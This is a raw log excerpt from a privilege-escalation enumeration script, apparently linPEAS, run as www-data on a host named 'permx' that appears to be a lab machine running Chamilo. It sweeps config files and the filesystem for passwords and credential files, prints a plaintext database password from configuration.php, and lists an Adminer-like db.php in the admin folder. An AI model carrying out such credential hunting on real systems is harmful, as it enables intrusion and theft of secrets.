/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Fixed bug introduced in 5.99 which broke the "-tagsFromFile @" feature
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Fixed problem which generated warnings about symbol "@indent" in Nikon.pm
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:    expanded beyond its "Image" roots!)
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Assume '-TagsFromFile @' for any redirected tags (eg. '-SRCTAG&gt;DSTTAG' or
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Ignore white space around '=' sign of arguments in '-@' file
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Fixed problem with new '-tagsFromFile @' feature which occurred when
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Allow target file to be specified by '@' with -TagsFromFile option
/var/www/chamilo/vendor/phpexiftool/exiftool/html/ancient_history.html:<li>Added -@ option and two utility files (iptc2xmp.args and xmp2iptc.args) to
/var/www/chamilo/vendor/sonata-project/admin-bundle/Resources/views/CRUD/base_history.html.twig:(c) Thomas Rabaix <thomas.rabaix@sonata-project.org>

╔══════════╣ Searching passwords in config PHP files
/var/www/chamilo/app/config/configuration.php:                'show_password_field' => false,
/var/www/chamilo/app/config/configuration.php:                'show_password_field' => true,
/var/www/chamilo/app/config/configuration.php:        'wget_password' => '',
/var/www/chamilo/app/config/configuration.php:    'force_different_password' => false,
/var/www/chamilo/app/config/configuration.php:$_configuration['auth_password_links'] = [
/var/www/chamilo/app/config/configuration.php:$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
/var/www/chamilo/app/config/configuration.php:$_configuration['password_encryption'] = 'bcrypt';
/var/www/chamilo/app/config/configuration.php:/*$_configuration['password_requirements'] = [
/var/www/chamilo/app/config/configuration.php://$_configuration['email_template_subscription_to_session_confirmation_lost_password'] = false;
/var/www/chamilo/app/config/configuration.php://$_configuration['force_renew_password_at_first_login'] = true;
/var/www/chamilo/app/config/configuration.php://$_configuration['password_conversion'] = false;
/var/www/chamilo/cli-config.php:    'password' => $_configuration['db_password'],
/var/www/chamilo/main/admin/db.php:';if($Qd=="auth"){$Ce="";foreach((array)$_SESSION["pwds"]as$mh=>$Mf){foreach($Mf
/var/www/chamilo/main/admin/db.php:<tr><th>Password<td><input name="pass" id="pass" value="',h($L["pass"]),'" autocomplete="new-password">
/var/www/chamilo/main/install/configuration.dist.php:                'show_password_field' => false,
/var/www/chamilo/main/install/configuration.dist.php:                'show_password_field' => true,
/var/www/chamilo/main/install/configuration.dist.php:        'wget_password' => '',
/var/www/chamilo/main/install/configuration.dist.php:    'force_different_password' => false,
/var/www/chamilo/main/install/configuration.dist.php:$_configuration['auth_password_links'] = [
/var/www/chamilo/main/install/configuration.dist.php:$_configuration['db_password'] = '{DATABASE_PASSWORD}';
/var/www/chamilo/main/install/configuration.dist.php:$_configuration['password_encryption'] = '{ENCRYPT_PASSWORD}';
/var/www/chamilo/main/install/configuration.dist.php:/*$_configuration['password_requirements'] = [
/var/www/chamilo/main/install/configuration.dist.php://$_configuration['email_template_subscription_to_session_confirmation_lost_password'] = false;
/var/www/chamilo/main/install/configuration.dist.php://$_configuration['force_renew_password_at_first_login'] = true;
/var/www/chamilo/main/install/configuration.dist.php://$_configuration['password_conversion'] = false;
/var/www/chamilo/main/install/update-configuration.inc.php:        } elseif (stripos($line, '$userPasswordCrypted') !== false) {
/var/www/chamilo/plugin/buycourses/database.php:        'password' => '',
/var/www/chamilo/plugin/buycourses/database.php:    $paypalTable->addColumn('password', Types::STRING);

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/simple_password_check.so
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-310.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-310.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-310.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-310.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-310.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-310.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/caching_sha2_password.so
/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/mysql_clear_password.so
/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/sha256_password.so
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc.perl
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords
/var/lib/pam/password
/var/www/chamilo/custompages/lostpassword-dist.php
/var/www/chamilo/main/auth/set_temp_password.php
/var/www/chamilo/main/cron/user_import/resend_email_with_new_password.php
/var/www/chamilo/main/inc/lib/javascript/password-checker
/var/www/chamilo/main/inc/lib/javascript/password-checker/password-checker.js
/var/www/chamilo/main/inc/lib/pear/HTML/QuickForm/password.php
/var/www/chamilo/main/template/default/custompage/lostpassword.tpl
/var/www/chamilo/main/template/default/mail/reset_password.tpl
/var/www/chamilo/plugin/clockworksms/sms_templates/account_created_updated_login_password.tpl
/var/www/chamilo/plugin/clockworksms/sms_templates/password_updated_login_password.tpl
/var/www/chamilo/plugin/clockworksms/sms_templates/requested_password_change.tpl

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r' 


www-data@permx:/tmp$ 

